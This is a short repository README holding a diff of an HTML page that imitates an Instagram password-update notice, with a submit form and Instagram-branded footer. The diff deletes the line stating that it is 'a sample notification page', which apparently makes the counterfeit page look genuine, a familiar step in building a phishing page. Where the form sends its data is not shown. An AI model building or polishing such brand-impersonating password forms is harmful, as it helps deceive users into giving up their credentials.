shanainaforever/Consious-/README.md

       <button class="btn" type="submit">Update Password</button>
     </form>
     <div class="footer">
-      This is a sample notification page.
       For your security, always use the official Instagram app or website to update your password.<br>
       &copy; 2025 Instagram Security Notice
     </div>
   </div>